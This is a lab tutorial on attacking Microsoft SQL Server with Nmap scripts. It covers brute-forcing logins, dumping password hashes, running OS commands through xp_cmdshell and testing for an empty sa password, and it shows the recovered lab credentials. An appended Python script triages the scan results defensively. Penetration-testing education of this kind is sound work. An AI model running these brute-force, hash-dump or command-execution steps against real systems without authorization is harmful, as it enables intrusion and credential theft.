
MSSQL for Pentester: Nmap

yardenweinn

To obtain basic information such as database names, usernames and table names from SQL servers running on Windows, we will carry out penetration testing using Nmap scripts. MSSQL is Microsoft SQL Server, a database management system used on the network. By default, it listens on port 1433. In our previous article, we set up a Microsoft SQL Server on Windows 10.

Table of Contents
  • Requirement
  • Enumerating version
  • Credential Brute Force
  • Execute SQL Query
  • NetBIOS Enumeration
  • MS-SQL Password Hash Dump
  • Command Execution
  • Test Empty Password Login
  • Enumerate Database Tables

Requirement

Attacker: Kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Nmap ships a collection of Lua-based NSE scripts that perform authenticated and unauthenticated penetration testing against MS-SQL on port 1433. The NSE scripts for MS-SQL can be listed with the command below.

Code:
locate '*.nse' | grep ms-sql



Enumerating version

This script attempts to determine configuration and version information for Microsoft SQL Server instances.

Code:
nmap -p 1433 --script ms-sql-info 192.168.1.146



Credential Brute Force

This script performs brute-force password auditing against MS-SQL servers; the connection timeout defaults to "5s". All we need are dictionaries of usernames and passwords, which are passed as script arguments.

Code:
nmap -p1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=pass.txt 192.168.1.146

In the image you can observe that we successfully retrieved credentials for three users:

Code:
Username: pavan and password: Password@123
Username: aarti and password: Password@123
Username: sa and password: Password@1



Execute SQL Query

Once you have retrieved login credentials, pass them to the NMAP script to execute an MS-SQL query. The command below executes the stored procedure "sp_databases" against the Microsoft SQL Server.

"sp_databases" is one of the built-in catalog stored procedures; it returns the list of database names on an instance of SQL Server.

Code:
nmap -p1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-query.query="sp_databases" 192.168.1.146



NetBIOS Enumeration

The NMAP script given below enumerates information from remote Microsoft SQL services that have NTLM authentication enabled.

Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials causes the remote service to respond with an NTLMSSP message that discloses information including the NetBIOS name, DNS name and OS build version.

Code:
nmap -p1433 --script ms-sql-ntlm-info 192.168.1.146



MS-SQL Password Hash Dump

The following command will dump the password hashes from an MS-SQL server in a format suitable for cracking with tools such as John the Ripper. To do so, the user needs the appropriate database privileges.

Code:
nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146

From the given image you can observe that it has dumped the password hash of the user sa, which we enumerated above.



Command Execution

xp_cmdshell is an extended stored procedure of Microsoft SQL Server that allows system administrators to execute operating system commands. By default, the xp_cmdshell option is disabled. The NMAP script will attempt to run a command through the command shell of Microsoft SQL Server if it finds that xp_cmdshell is enabled on the targeted server.

Code:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.146

From the depicted image you can perceive the output for the “net user” command.



Test Empty Password Login

If the administrator of Microsoft SQL Server left the password blank for a login, an attacker can log in to the database server directly; as shown in the image below, we are inspecting the properties of the "sa" account.



The following NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

Code:
nmap -p1433 --script ms-sql-empty-password 192.168.1.146

We successfully logged in with user sa and an empty password, as you can see in the screenshot below.



Enumerate Database Tables

The following command will attempt to fetch a list of tables from inside the Microsoft SQL Server by passing login credentials as arguments to the Nmap script.

Code:
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146

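When several of the scripts above are run in one audit with XML output (nmap -oX), the results are easier to act on when they are consolidated into a single prioritized list. The following Python is added here and is not part of the original article or of Nmap: it parses a constructed nmap XML document, collects the version disclosed by ms-sql-info and the logins reported as "Login Success" by ms-sql-empty-password and ms-sql-brute, drops the passwords so the report itself does not become a credential store, and ranks the findings for remediation. The host, version string and accounts in the sample are made up; the output text only mimics the scripts' human-readable format.

```python
import re
import xml.etree.ElementTree as ET

# Constructed `nmap -oX` output for the scripts used above. The output text mimics the
# NSE scripts' human-readable format; host, version and accounts are made up here.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
<host><address addr="192.168.1.146" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/>
<script id="ms-sql-info" output="&#xa;  192.168.1.146:1433:&#xa;    Version:&#xa;      name: Microsoft SQL Server 2019 RTM&#xa;      number: 15.00.2000.00&#xa;    TCP port: 1433"/>
<script id="ms-sql-empty-password" output="&#xa;  192.168.1.146:1433:&#xa;    sa:&lt;empty&gt; =&gt; Login Success"/>
<script id="ms-sql-brute" output="&#xa;  192.168.1.146:1433:&#xa;    pavan:Password@123 =&gt; Login Success&#xa;    aarti:Password@123 =&gt; Login Success"/>
</port></ports></host></nmaprun>"""

# "<user>:<password> => Login Success" lines written by ms-sql-brute and ms-sql-empty-password
SUCCESS_RE = re.compile(r"^\s*(\S+?):.*? => Login Success", re.M)

def parse_mssql_findings(xml_text):
    """Per host: disclosed version, logins with an empty password, logins guessed from a wordlist.
    Only usernames are kept; the passwords in the script output are deliberately discarded."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        entry = {"version": None, "empty_password": [], "guessed": []}
        for script in host.iter("script"):
            sid, out = script.get("id"), script.get("output", "")
            if sid == "ms-sql-info":
                m = re.search(r"name:\s*(.+)", out)
                entry["version"] = m.group(1).strip() if m else None
            elif sid == "ms-sql-empty-password":
                entry["empty_password"] += SUCCESS_RE.findall(out)
            elif sid == "ms-sql-brute":
                entry["guessed"] += SUCCESS_RE.findall(out)
        findings[addr] = entry
    return findings

def triage(findings):
    """Rank findings for remediation: any usable sa login first, version disclosure last."""
    order = {"critical": 0, "high": 1, "info": 2}
    alerts = []
    for host, f in findings.items():
        for user in f["empty_password"]:
            alerts.append(("critical", host, f"login '{user}' accepts an empty password"))
        for user in f["guessed"]:
            sev = "critical" if user.lower() == "sa" else "high"
            alerts.append((sev, host, f"password for login '{user}' was guessed from a wordlist"))
        if f["version"]:
            alerts.append(("info", host, f"version disclosed without authentication: {f['version']}"))
    return sorted(alerts, key=lambda a: order[a[0]])
```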


Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets.
 
